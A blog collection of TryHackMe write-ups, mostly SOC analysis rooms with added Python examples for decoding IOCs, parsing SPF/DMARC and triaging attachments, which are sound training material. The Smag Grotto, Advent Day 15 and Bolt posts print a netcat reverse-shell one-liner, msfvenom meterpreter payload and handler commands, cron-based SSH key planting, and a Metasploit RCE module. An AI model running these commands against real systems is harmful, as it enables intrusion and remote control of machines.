
Thursday, February 5, 2026

TryHackMe - Shadow Trace Writeup

Shadow Trace is a premium room on TryHackMe.com, part of the SOC Level 1 path.

We need to analyse a suspicious file, uncover hidden clues, and trace the source of the infection.


Task 2 - File analysis


Q1 What is the architecture of the binary file windows-update.exe?

I opened the file with the PEstudio program and looked under indicators / file-type

64-bit


Q2 What is the hash (sha-256) of the file windows-update.exe?

Under footprints - file > sha256


b2a88de3e3bcfae4a4b38fa36e884c586b5cb2c2c283e71fba59efdb9ea64bfc


Q3 Identify the URL within the file to use it as an IOC


From PEstudio, under indicators / strings - url-pattern

hxxp[://]tryhatme[.]com/update/security-update[.]exe


Q4 With the URL identified, can you spot a domain that can be used as an IOC?

strings .\Desktop\windows-update.exe | findstr "tryhatme"

responses[.]tryhatme[.]com


Q5 Input the decoded flag from the suspicious domain

strings .\Desktop\windows-update.exe | findstr "tryhatme"

The flag is hiding at the end of the first "link" and needs to be decoded; I used CyberChef with base64 decoding and voila, the flag was there.

THM{you_g0t_some_IOCs_friend}

Q6 What library related to socket communication is loaded by the binary?

In PEstudio I went through the libraries and, with knowledge from previous rooms, I found the one responsible

WS2_32.dll


Task 3 - Alerts Analysis


Q1 Can you identify the malicious URL from the trigger by the process powershell.exe?

The URL in the trigger is base64 encoded; I used the decoder in CyberChef.

https[:]//tryhatme[.]com/dev/main[.]exe


Q2 Can you identify the malicious URL from the alert triggered by chrome.exe?

The URL in the trigger is encoded as decimal values with colon separators; I used the decoder in CyberChef.

hxxps[://]reallysecureupdate[.]tryhatme[.]com/update[.]exe


Q3 What's the name of the file saved in the alert triggered by chrome.exe?

The name of the file is written in the trigger; read the alert carefully and you will see the file name.

test.txt
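Both alert tasks above come down to the same analyst routine: decode the URL (base64 in one alert, colon-separated decimal bytes in the other), pull out the domain, and defang everything before it goes into a report. The following is an added example, not code from the write-up or from TryHackMe; the two sample strings are constructed here by encoding the URLs already given above, so they are not the room's actual alert data.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed samples, not the room's alert data: the two encodings the
# alerts use, applied to the (refanged) URLs quoted in the write-up.
B64_SAMPLE = base64.b64encode(b"https://tryhatme.com/dev/main.exe").decode()
DEC_SAMPLE = ":".join(str(b) for b in b"https://reallysecureupdate.tryhatme.com/update.exe")


def decode_base64(text):
    """Decode base64, tolerating the missing '=' padding often seen in alert fields."""
    text = text.strip()
    padded = text + "=" * (-len(text) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")


def decode_decimal(text, sep=":"):
    """Decode 'NNN:NNN:...' (one decimal byte value per field) back into text."""
    return bytes(int(part) for part in text.split(sep)).decode("utf-8", errors="replace")


def decode_any(text):
    """Pick the decoder from the shape of the input."""
    if re.fullmatch(r"\d{1,3}(:\d{1,3})+", text.strip()):
        return decode_decimal(text.strip())
    return decode_base64(text)


def defang(url):
    """Render a URL so it cannot be clicked by accident: http -> hxxp, :// -> [://], . -> [.]"""
    url = re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)
    return url.replace("://", "[://]").replace(".", "[.]")


def triage(encoded):
    """Decode an encoded URL from an alert and return the IOCs a report needs."""
    url = decode_any(encoded)
    host = urlparse(url).hostname or ""
    return {
        "url": url,
        "domain": host,
        "defanged_url": defang(url),
        "defanged_domain": host.replace(".", "[.]"),
    }


if __name__ == "__main__":
    for sample in (B64_SAMPLE, DEC_SAMPLE):
        print(triage(sample))
```

The decimal detector is deliberately strict (only digits and colons), so anything else falls through to base64; a value that is neither will raise from `b64decode`, which is the right outcome for an unknown encoding rather than a silently wrong IOC.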

Saturday, January 17, 2026

TryHackMe - Phishing Prevention room


Phishing Prevention is the fourth room in TryHackMe’s Phishing Analysis module under the SOC Level 1 path. If you're working through the room and get stuck, this guide provides clear hints and answers to help you progress without frustration.

Task 2

Q1 Based on TryHackMe's SPF record above, how many domains are authorized to send email on its behalf?

3

Q2 What is the intended action of an email that returns a SoftFail verification result?

Flag



Task 3

Q1 Based on the sample header above, what is the reason for the permerror?

no key for signature


Task 4

Q1 Which DMARC policy provides the greatest amount of protection by blocking emails that fail the DMARC check?

p=reject
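Tasks 2 and 4 are answered by reading the SPF and DMARC records by hand; the same reading can be scripted, which helps when checking many domains. The following is an added example, not code from the write-up or from TryHackMe, and the two records in it are constructed (TryHackMe's real records are not reproduced here). It lists the sending sources an SPF record authorizes, reports what the qualifier on `all` asks receivers to do (the `~all` SoftFail case above means accept but flag), and tells whether a DMARC policy actually blocks failing mail.

```python
# Constructed records, not TryHackMe's real DNS entries: one SPF record with a
# soft-fail qualifier and one DMARC record with a quarantine policy.
SPF_RECORD = "v=spf1 include:_spf.example.net include:mail.example.org ip4:203.0.113.0/24 ~all"
DMARC_RECORD = "v=DMARC1; p=quarantine; rua=mailto:dmarc@example.com; pct=100"

# What the receiver should do with mail from an unlisted source, per qualifier on "all".
ALL_QUALIFIERS = {
    "+": ("Pass", "accept"),
    "-": ("Fail", "reject"),
    "~": ("SoftFail", "accept but flag as suspicious"),
    "?": ("Neutral", "no policy, treat like no record"),
}

# SPF mechanisms that authorize a sending source.
SOURCE_MECHANISMS = {"include", "a", "mx", "ip4", "ip6", "exists"}


def parse_spf(record):
    """Return the authorized sources and the 'all' qualifier of an SPF TXT record."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    authorized = []
    all_qualifier = None
    for term in terms[1:]:
        qualifier = "+"                      # an unqualified mechanism means Pass
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        name = name.lower()
        if name == "all":
            all_qualifier = qualifier
        elif name in SOURCE_MECHANISMS:
            authorized.append((name, value))
        # modifiers such as redirect= and exp= are left out of this example
    return {
        "authorized": authorized,
        "all_qualifier": all_qualifier,
        "unlisted_sender_result": ALL_QUALIFIERS.get(all_qualifier),
    }


def parse_dmarc(record):
    """Split a DMARC TXT record into its tag=value pairs."""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


DMARC_STRENGTH = {"none": 0, "quarantine": 1, "reject": 2}


def dmarc_blocks_failures(tags):
    """True only for p=reject, the one policy that actually blocks failing mail."""
    policy = tags.get("p", "none").lower()
    return DMARC_STRENGTH.get(policy, 0) == DMARC_STRENGTH["reject"]


if __name__ == "__main__":
    print(parse_spf(SPF_RECORD))
    print(parse_dmarc(DMARC_RECORD), dmarc_blocks_failures(parse_dmarc(DMARC_RECORD)))
```

Note that `include:` pulls in another domain's whole record, so the count of authorized domains is only the first level; a full evaluator would resolve those recursively and enforce the 10-lookup limit.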


Task 5

Q1  Which S/MIME component ensures that only the intended recipient can read the contents of an email message?

This can be found in the description of the task - encryption


Task 6

Q1 Which Wireshark filter can you use to narrow down your results based on SMTP response codes?

smtp.response.code

Q2 How many packets in the capture contain the SMTP response code 220 Service ready?

19

Q3 One SMTP response indicates that an email was blocked by spamhaus.org. What response code did the server return?

553

Q4 Based on the packet from the previous question, what is the full Response code: message?

Requested action not taken: mailbox name not allowed (553)

Q5 Search for response code 552. How many messages were blocked for presenting potential security issues?

6


Task 7 

Q1 How many SMTP packets are available for analysis? 

Filter the pcap file for smtp traffic; the packet count is your answer.

Q2  What is the name of the attachment in packet 270?

I sorted the packets by id/number, searched for 270, checked the Line-based text data and saw it there.

Or use Ctrl+G, enter the number and go to that packet.

Q3 According to the message in packet 270, which Host IP address is not responding, making the message undeliverable?

You can read through the email content and find the correct IP

Q4 By filtering for imf, which email client was used to send the message containing the attachment attachment.scr?

Filter by imf and then look through the emails to see which one contains the attachment.

Q5  Which type of encoding is used for this potentially malicious attachment?

The answer can be found under Content-Transfer-Encoding.
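Questions 2 to 5 of Task 7 are the pieces of a standard attachment triage: which part is the attachment, what client sent it, how it is transfer-encoded, and what its hash is once decoded. The following is an added example, not code from the write-up or from TryHackMe; it runs the same triage over a constructed message (the room's pcap is not reproduced) using only the standard library's `email` package, and flags the `.scr` extension the way a gateway rule would.

```python
import base64
import hashlib
from email import message_from_string, policy

# Constructed message, not the room's pcap: a text body plus a base64 attachment
# whose .scr extension is the kind of thing a mail gateway should flag.
FAKE_PAYLOAD = b"MZ not a real program, just constructed bytes for the example\n"
RAW_EMAIL = (
    "From: Sender <sender@example.com>\r\n"
    "To: victim@example.org\r\n"
    "Subject: Your CV\r\n"
    "User-Agent: ExampleMailer/1.0\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="b1"\r\n'
    "\r\n"
    "--b1\r\n"
    "Content-Type: text/plain; charset=utf-8\r\n"
    "\r\n"
    "Please review the attached file.\r\n"
    "--b1\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    'Content-Disposition: attachment; filename="attachment.scr"\r\n'
    "\r\n"
    + base64.b64encode(FAKE_PAYLOAD).decode() + "\r\n"
    "--b1--\r\n"
)

RISKY_EXTENSIONS = {".scr", ".exe", ".js", ".vbs", ".hta", ".bat", ".cmd", ".ps1"}


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def triage_attachments(raw):
    """List every attachment with its transfer encoding, hash and a risk flag."""
    msg = message_from_string(raw, policy=policy.default)
    # the sending client is usually recorded in User-Agent or X-Mailer
    client = str(msg.get("User-Agent") or msg.get("X-Mailer") or "")
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""   # base64/QP decoded to raw bytes
        ext = name[name.rfind("."):].lower() if "." in name else ""
        results.append({
            "filename": name,
            "transfer_encoding": str(part.get("Content-Transfer-Encoding", "")).lower(),
            "size": len(payload),
            "sha256": sha256_hex(payload),          # the value you would look up on VirusTotal
            "risky_extension": ext in RISKY_EXTENSIONS,
            "client": client,
        })
    return results


if __name__ == "__main__":
    for item in triage_attachments(RAW_EMAIL):
        print(item)
```

Hashing the decoded bytes matters: hashing the base64 text as it appears on the wire gives a value that will never match a threat-intel lookup.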

Task 8 

Q1 A security team wants to implement a control to detect hidden malware inside email attachments.
They need a way to analyze suspicious files without risking infection on real systems.
Which protective technique would allow them to observe a file's behavior safely?

The answer can be found in the explanation part of this task - Sandboxing

Thursday, December 29, 2022

TryHackMe - Smag Grotto - writeup

Smag Grotto is one of the easy CTF rooms on TryHackMe.com. Here are the steps that led me to the solution and to both the user and root flag. Before you start you need to boot up the VM and the AttackBox machine.
  1. step
  2. First I ran an nmap scan:
    nmap -sC VM_IP
    The scan shows that only 2 ports are open - ssh and http. Connecting to the page IP didn't give me much more info.
  3. step
  4. I then enumerated the VM with gobuster:
    gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
    With gobuster I found the /mail folder.
  5. step
  6. Then I opened the /mail folder, where we find email correspondence with a .pcap trace file.
  7. step
  8. I downloaded the pcap file and opened it with Wireshark. In the trace file I found the new domain where the site is located. I also found the username and password for the login.
  9. step
  10. To access the new domain I added VM_IP and the domain I found in the .pcap file to the /etc/hosts file on the AttackBox machine.
  11. step
  12. Now I entered the domain in the web browser, found the login.php script and entered the credentials from the .pcap file.
  13. step
  14. After the login you are on a site where you can enter commands. I had to look around the internet for a hint on what to do in this step. Here we initiate the reverse shell and start an nc listener on the AttackBox. I ran:
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attackbox_IP 1338 >/tmp/f
    On the AttackBox I started the nc listener:
    nc -lvnp 1338
  15. step
  16. In a second I got shell access as www-data. After that I checked the cronjob settings and saw that there is a copy of the /opt/.backups/jake_id_rsa.pub.backup public key into the authorized keys. Hmmm, I think we could exploit this one by putting our public key in place of the legit key.
  17. step
  18. On the AttackBox machine we can create our key with the following command:
    ssh-keygen -t rsa -P '' -f jakekey
    Then we open the public key file and copy it to the target machine with:
    echo "public_key_we_created" > jake_id_rsa.pub.backup
    Note that you need to create the file in the /opt/.backups/ folder and the filename needs to be exactly as stated above, so that the cronjob picks up our file and we can log in to the machine.
  19. step
  20. OK, in this step I tried to log in to the machine using the key. But of course I had a bit forgotten how to do it, so I had to look for a little help on the exact command for connecting with ssh keys.
    ssh -i jakekey jake@development.smag.thm
    Then I pressed enter and I was logged in as jake. We can now search for the user flag.
    find / -type f -name user.txt 2>/dev/null
  21. step
  22. Then I can open the user.txt file and copy the flag.
  23. step
  24. Now I was only missing the root flag, and I could access the file only as root. I checked what programs I could run as the jake user:
    sudo -l
    The output of the command showed us that the apt-get command can be run as the jake user.
  25. step
  26. To do so we head over to GTFOBins and find the command that we can run as the current user to get root access.

  27. step
  28. We can find the root flag at:
    cat /root/root.txt
I hope anyone who gets stuck finds it helpful
AudiTTRSi

Saturday, December 17, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 17 - writeup

Advent of Cyber is now a regular seasonal room on the TryHackMe page. This is their 4th time, again with an awesome story to follow through each day's assignment. Day 17 covers the topic of Regular Expressions.
  1. Question 1, Question 2
  2. To answer the first two questions you can use the following regular expression:
    ^[a-zA-Z0-9]{6,12}$
  3. Question 3, Question 4
  4. The following regular expression will help you get the answers:
    ^.+@.+\.com$
  5. Question 5
  6. The following regular expression will help you get the answer:
    lewisham44
  7. Question 6
  8. The following regular expression will help you get the answer:
    maxximax
  9. Question 7
  10. The following regular expression will help you get the answer:
    ^.+@.+\.com$
  11. Question 8, Question 9
  12. ^http(s)?.{3}(www)?.+..+$
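To see what the three patterns above actually accept and reject, it helps to run them over a handful of lines rather than trust them by eye. The following is an added example, not code from the write-up or from TryHackMe; the patterns are the ones given above, unchanged, and the sample lines are constructed here (the two usernames from the post are included among them). It mirrors what `grep -E` does: keep the lines the pattern matches.

```python
import re

# The three patterns from the write-up above, compiled once. Note that the
# unescaped dots in the URL pattern match any character, not only a literal ".".
PATTERNS = {
    "username": re.compile(r"^[a-zA-Z0-9]{6,12}$"),
    "email": re.compile(r"^.+@.+\.com$"),
    "url": re.compile(r"^http(s)?.{3}(www)?.+..+$"),
}

# Constructed sample lines, not the room's data.
SAMPLES = {
    "username": ["lewisham44", "maxximax", "abc", "toolong_user_name", "has-dash1", "exactly12chr"],
    "email": ["santa@northpole.com", "elf@workshop.co.uk", "no-at-sign.com", "a@b.com"],
    "url": ["https://www.example.com", "http://example.org/page", "ftp://example.com", "https://nodots"],
}


def matches(kind, lines):
    """Return the lines that the chosen pattern matches, the way grep -E would keep them."""
    pattern = PATTERNS[kind]
    return [line for line in lines if pattern.search(line.strip())]


def report():
    """Run every pattern over its sample lines and collect the matches."""
    return {kind: matches(kind, lines) for kind, lines in SAMPLES.items()}


if __name__ == "__main__":
    for kind, hits in report().items():
        print(kind, hits)
```

The last URL sample shows the cost of the unescaped dots: `https://nodots` has no dot at all yet still matches, because `.+..+` only asks for three or more arbitrary characters after the scheme.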
I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe - ItsyBitsy - writeup

The ItsyBitsy room is the second room in the Security Information and Event Management module of the SOC Level 1 path on TryHackMe. Put your ELK knowledge together and investigate an incident. First you will need to boot up the VM and the AttackBox, which will take a few minutes. After the AttackBox is booted up we can open the Firefox browser and access Kibana.
  1. Question 1 - How many events were returned for the month of March 2022?
  2. Change the date range to look at the March 2022 logs and you can answer the first question.
  3. Question 2 - What is the IP associated with the suspected user in the logs?
  4. The question is asking about the source_ip field. From the logs we can see 2 IP addresses, so you have to do some work to find the right one.
  5. Question 3 - The user’s machine used a legit windows binary to download a file from the C2 server. What is the name of the binary?
  6. Answering this question took me the longest, because I was either looking in the wrong place or looking at the right answer without realising it was the answer. Hint: look at the user_agent field ;)
  7. Question 4 - The infected machine connected with a famous filesharing site in this period, which also acts as a C2 server used by the malware authors to communicate. What is the name of the filesharing site?
  8. When we filter by the IP from Question 2 we can answer this one quickly, because there are only 2 logs from that source_ip.
  9. Question 5 - What is the full URL of the C2 to which the infected host is connected?
  10. Hostname + url field.
  11. Question 6 - A file was accessed on the filesharing site. What is the name of the file accessed?
  12. We can open the filesharing site URL from the previous question and find the file there.
  13. Question 7 - The file contains a secret code with the format THM{_____}.
  14. Open the file on the filesharing site and copy the flag code.
I hope anyone who gets stuck finds it helpful
AudiTTRSi

Friday, December 16, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 16 - writeup

Advent of Cyber is now a regular seasonal room on the TryHackMe page. This is their 4th time, again with an awesome story to follow through each day's assignment. Today's task covers the topic of SQL Injection (SQLi). SQL injection is the placement of malicious code in SQL statements via web page input. If this vulnerability exists, attackers will most probably try to query the database to return all of the users and passwords of the application. Before you start solving the task you need to boot up the VM in the task and the AttackBox for accessing the page. It will probably take a minute or two to boot up. After that we can open the link to the developer page of the app we will try to fix. We log in with the provided credentials.
  1. Question 1 - Fixing SQLi by Data Type Validation
  2. First we use the fix from the task description to fix the first and then the second query in the elf.php file; after we have saved and pressed run we get the first flag.
  3. Question 2 - Fixing SQLi Using Prepared Statements
  4. With the prepared statement described in the task we can quickly fix search_toys.php and get the second flag.
  5. Question 3
  6. To find the third flag we need to fix toy.php; we can easily fix it the same way we fixed elf.php, with data type validation.
  7. Question 4
  8. To fix the 4th vulnerability and get the fourth flag we need to fix login.php. We do it with a prepared statement as we did for the second flag. Just make sure you use $username and $password instead of $q.
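The two fixes used in this day (data type validation for the numeric id, prepared statements for the string lookups) are shown side by side with the vulnerable forms below. This is an added example, not the room's PHP code or anything from TryHackMe; it uses Python's `sqlite3` with a constructed in-memory database so it can be run anywhere, and the table and row names are invented for the example.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the room's database, populated with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE elves (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO elves VALUES (?, ?)", [(1, "elf-one"), (2, "elf-two")])
    # plaintext password only to keep the demo small; real code stores a hash
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return conn


def get_elf_vulnerable(conn, elf_id):
    """'Before' form: the request parameter is pasted straight into the SQL text."""
    return conn.execute(f"SELECT name FROM elves WHERE id = {elf_id}").fetchall()


def get_elf_validated(conn, elf_id):
    """Fix 1, data type validation: an id must be an integer, anything else is refused."""
    if not str(elf_id).isdigit():
        raise ValueError("id must be an integer")
    return conn.execute("SELECT name FROM elves WHERE id = ?", (int(elf_id),)).fetchall()


def login_vulnerable(conn, username, password):
    """'Before' form: a quote in the input changes the meaning of the statement."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_prepared(conn, username, password):
    """Fix 2, prepared statement: placeholders keep the input as data, never as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable id lookup:", get_elf_vulnerable(db, "1 OR 1=1"))
    print("prepared login with a quote in the username:", login_prepared(db, "admin' --", "x"))
```

The prepared form needs no escaping of its own: the driver sends the statement and the values separately, so the same `admin' --` input that rewrites the vulnerable query is simply compared as a literal username and finds nothing.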
I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe.com - Advent of Cyber 2022 - Day 15 - writeup

Advent of Cyber is now a regular seasonal room on the TryHackMe page. This is their 4th time, again with an awesome story to follow through each day's assignment. Here are my solutions for Day 15, if anyone gets stuck or needs a bit of help solving the questions. Today's task addresses input validation of file upload functionality and unrestricted file upload vulnerabilities. If any of these flaws are present in the site, a threat actor can exploit them and get access to the server. First you need to boot up the VM and AttackBox, since they take some time to boot up. All questions except Q3 can be answered by carefully reading the task description of the vulnerabilities and how to avoid them. For Q3 we need to create the payload; we get the command in the task description:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=AttackBox_IP LPORT="Listening port" -f exe -o cv-username.exe
It will take a minute to generate it. It will be saved in the AttackBox /root folder. Then you run the second command to create the listener:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST AttackBox_IP; set LPORT 'listening port'; exploit"
After that we can head to the Firefox browser and upload the payload file we created in the first step. Now we can open the listener window and wait until the file that we uploaded to the website is run. When the connection is active we can move through the directories:
  1. pwd to check where we are
  2. cd ../..
  3. we head to the HR Elf's Documents directory
  4. cat flag.txt
I hope anyone who gets stuck finds it helpful
AudiTTRSi

Wednesday, December 14, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 14 - writeup

Advent of Cyber is now a regular seasonal room on the TryHackMe page. This is their 4th time, again with an awesome story to follow through each day's assignment. Here are my solutions for Day 14, if anyone gets stuck or needs a bit of help solving the questions. First you need to boot up the VM and AttackBox, since they take some time to boot up. After both the VM and the AttackBox machine are booted up you can open the website on the provided IP and port 8080 and log in with the credentials provided in the task description. Because of a vulnerability present in the web application we can freely change the ids in the web address, so we cycle through the registered users (changing the profile id numbers) and find the answer to the first question.
For the second one we copy the profile picture and change the id number for images, because profile images have the same vulnerability, so we can cycle through the pictures and find the picture containing the flag, which is the answer to the second question. I hope anyone who gets stuck finds it helpful
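The flaw behind both questions is that the application trusts the id in the URL and never checks that the record belongs to the logged-in user. The following is an added example, not the room's code or anything from TryHackMe: it shows that missing check next to its fixed form, and a small detector that spots the id-cycling behaviour described above in a constructed access log (the log lines and profile records are invented for the example).

```python
import re
from collections import defaultdict

# Constructed records, not the room's application data.
PROFILES = {
    1: {"owner": "alice", "bio": "alice's profile", "picture": "pic-1.png"},
    2: {"owner": "bob", "bio": "bob's profile", "picture": "pic-2.png"},
}


def get_profile_vulnerable(profile_id, _session_user):
    """'Before' form: the id from the URL is trusted, any logged-in user can read any record."""
    return PROFILES.get(profile_id)


def get_profile_checked(profile_id, session_user):
    """Fix: object-level authorization, the record must belong to the session user."""
    profile = PROFILES.get(profile_id)
    if profile is None or profile["owner"] != session_user:
        return None      # respond 404/403 rather than leaking whether the id exists
    return profile


def enumerate_ids(fetch, session_user, id_range):
    """Walk a range of ids as one user and return the ones that came back, the cycling described above."""
    return [i for i in id_range if fetch(i, session_user) is not None]


# Constructed access-log excerpt: one user walking profile ids in sequence.
ACCESS_LOG = """\
user=alice GET /profile?id=1
user=alice GET /profile?id=2
user=alice GET /profile?id=3
user=alice GET /profile?id=4
user=bob GET /profile?id=2
user=alice GET /image?id=7
"""
LOG_RE = re.compile(r"user=(\w+) GET /(profile|image)\?id=(\d+)")


def detect_enumeration(log_text, threshold=3):
    """Flag (user, object type, distinct ids) where one user pulled more than `threshold` distinct ids."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m:
            user, kind, obj_id = m.groups()
            seen[(user, kind)].add(int(obj_id))
    return sorted((user, kind, len(ids)) for (user, kind), ids in seen.items() if len(ids) > threshold)


if __name__ == "__main__":
    print("vulnerable:", enumerate_ids(get_profile_vulnerable, "alice", range(1, 5)))
    print("checked:", enumerate_ids(get_profile_checked, "alice", range(1, 5)))
    print("enumeration suspects:", detect_enumeration(ACCESS_LOG))
```

The detector threshold is a starting point only; a real rule would key on session and time window, and the image endpoint needs the same ownership check as the profile one since both share the flaw.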
AudiTTRSi

Tuesday, December 13, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 13 - writeup

Advent of Cyber is now a regular seasonal room on the TryHackMe page. This is their 4th time, again with an awesome story to follow through each day's assignment. Here are my solutions for Day 13, if anyone gets stuck or needs a bit of help solving the questions. In today's task the main program is Wireshark. Wireshark is a free and open-source packet analyzer which will help us solve today's task. Before you start answering the questions you need to start the VM, which takes a few minutes. After the VM is booted up you can open the trace file which is placed on the desktop.
  1. Q1

  2. When you have opened the file you can open the drop-down menu Statistics / Protocol Hierarchy. With the data from the popup window we can answer the first question.
  3. Q2

  4. We can now close the Protocol Hierarchy window and open Statistics / Conversations, where under the TCP tab you will find all the data to answer the second question.
  5. Q3

  6. To answer this question you will need to google which service uses this port.
  7. Q4

  8. In the search/filter bar write dns to filter only DNS packets, and in the packets under Query / Name we can see the domain names that were looked up. Don't forget to defang the answers. Defanging is the process of formatting a URL in such a way that it can't be clicked by accident. You also shouldn't forget to put them in alphabetical order.
  9. Q5 & Q6 & Q7 & Q8

  10. We filter by http requests and then we can find the answers to questions 5 to 8.
  11. Q9

  12. To export files from the trace we head to File / Export Objects / HTTP... and download the file. To obtain the hash value of the file we can run
    sha256sum filename
    and copy the relevant part of the output.
  13. Q10

  14. Open VirusTotal, paste the hash value of the malicious file, and in the Behavior tab you will find the answer to this last question. Don't forget to defang the answers.
I hope anyone who gets stuck finds it helpful
AudiTTRSi

Tuesday, December 6, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 6 - writeup

Advent of Cyber is now a regular seasonal room on the TryHackMe page. This is their 4th time, again with an awesome story to follow through each day's assignment. Here are my solutions for Day 6, if anyone gets stuck. Open the email in a text editor and you can solve most of the questions by analysis.
  1. Q1

  2. The answer hides in the 4th line of the email file - From:
  3. Q2

  4. The answer hides in the 14th line of the email file - Return-Path:
  5. Q3

  6. The answer hides in the 4th line of the email file.
  7. Q4

  8. The answer hides in the 11th line of the email file - X-spam score
  9. Q5

  10. Copy the value from the Message ID into CyberChef and decode it from base64. The output is the answer to this question.
  11. Q6

  12. Go to EmailRep and enter the sender's email. The answer will appear right below the entry box where you entered the email.
  13. Q7

  14. Open a terminal, move to the eml_attachments folder on the desktop and run:
    sha256sum file_name
    to get the hash value, which is the answer to Q7.
  15. Q8

  16. Visit the VirusTotal site and enter the attachment's hash.
  17. Q9

  18. Visit the InQuest site, enter the attachment's hash and look for the answer on the site.
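Q1 to Q5 above are all header reads: From, Return-Path, the spam score, and a Message-ID whose local part is base64. The following is an added example, not code from the write-up or from TryHackMe, that performs the same reads with the standard library and adds the one comparison an analyst makes by reflex: whether the From domain matches the Return-Path (bounce) domain. The .eml content is constructed for the example and is not the room's file.

```python
import base64
from email import message_from_string
from email.utils import parseaddr

# Constructed .eml header block, not the room's file. The Message-ID local part
# carries a base64 string, as in the Q5 question above.
HIDDEN_ID = "constructed sample id"
RAW_EMAIL = (
    "Return-Path: <bounce@mailer.example.net>\n"
    "Received: from mailer.example.net (mailer.example.net [203.0.113.5])\n"
    "X-Spam-Score: 7.5\n"
    "Message-ID: <" + base64.b64encode(HIDDEN_ID.encode()).decode() + "@example.net>\n"
    'From: "Santa" <santa@example.com>\n'
    "To: elf@example.org\n"
    "Subject: Gift list\n"
    "\n"
    "Please send your list.\n"
)


def domain_of(address):
    """Domain part of an address, lowercased, or '' if there is none."""
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def decode_message_id(msg_id):
    """Base64-decode the local part of a Message-ID, or return None if it is not base64."""
    local_part = msg_id.strip().strip("<>").split("@", 1)[0]
    try:
        return base64.b64decode(local_part, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_headers(raw):
    """Pull the fields the Day 6 questions ask about out of a raw message."""
    msg = message_from_string(raw)
    from_addr = parseaddr(msg.get("From", ""))[1]
    return_path = parseaddr(msg.get("Return-Path", ""))[1]
    spam = msg.get("X-Spam-Score")
    return {
        "from": from_addr,
        "return_path": return_path,
        # a From domain that differs from the bounce domain is a classic spoofing tell
        "sender_mismatch": domain_of(from_addr) != domain_of(return_path),
        "spam_score": float(spam) if spam else None,
        "decoded_message_id": decode_message_id(msg.get("Message-ID", "")),
    }


if __name__ == "__main__":
    print(analyze_headers(RAW_EMAIL))
```

Reading by line number, as the answers above do, works for one file; parsing by header name works for the next thousand, since header order is not fixed.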
I hope anyone who gets stuck finds it helpful
AudiTTRSi

Saturday, December 3, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 3 - writeup

Advent of Cyber is now a regular seasonal room on the TryHackMe page. This is their 4th time, again with an awesome story to follow through each day's assignment. Here are my solutions for Day 3, if anyone gets stuck. Today's assignment covers OSINT techniques.
OSINT is gathering and analysing publicly accessible data for intel purposes. For example:
  • the internet
  • mass media
  • journals and research papers
  • photos
  • location information
  1. Q1

  2. To answer the first question you will need to visit who.is to get info about the domain in question.
  3. Q2

  4. I was looking on GitHub to find the source repository. What is the name of the file where you would usually save settings?
  5. Q3

  6. I was looking on GitHub to find the source repository. What is the name of the file where you would usually save settings?
  7. Q4

  8. To successfully answer this one you have to search through the file we talked about in Q2 and Q3.
  9. Q5

  10. To successfully answer this one you have to search through the file we talked about in Q2 and Q3.
I hope anyone who gets stuck finds it helpful AudiTTRSi

Friday, December 2, 2022

TryHackMe.com - Advent of Cyber 2022 - Day 2 - writeup

Advent of Cyber is now a regular seasonal room on the TryHackMe page. This is their 4th time, again with an awesome story to follow through each day's assignment. Here are my solutions for Day 2, if anyone gets stuck.
  1. Q2

  2. To answer this, run the following command in the home folder:
    ls
  3. Q3

  4. With the previous command you can answer Q3.
  5. Q5

  6. Display the server log file in the console, where you see the dates; check the weekday and you can answer the question.
  7. Q6

  8. By displaying the server log file we can see that the logs contain only one IP address.
  9. Q7

  10. grep -v 404 webserver.log
    This displays all lines that do not include 404 requests, so you see only the successful ones and can then easily see the answer.
  11. Q8

  12. grep -i THM *.log

    This greps through all log files in the folder to find the flag.
I hope anyone finds it useful AudiTTRSi

Monday, April 4, 2022

TryHackMe - Bolt

Bolt is one of the easiest rooms for beginners on TryHackMe.com. After running a basic nmap scan:

nmap -sC -sV Target_IP

we can see the open ports; the most interesting is port 8000, running Bolt CMS.
After looking around the web page, we find the login username and password in a post on the page. We can search for vulnerabilities via web search and find one for Authenticated Remote Code Execution. How will you tackle this one? I used Metasploit with the module exploit/unix/webapp/bolt_authenticated_r. Through the Metasploit console set up the needed variables LHOST, RHOST, USERNAME, PASSWORD and run the exploit. We then need to run:

find / -type f -name flag.txt 2>/dev/null

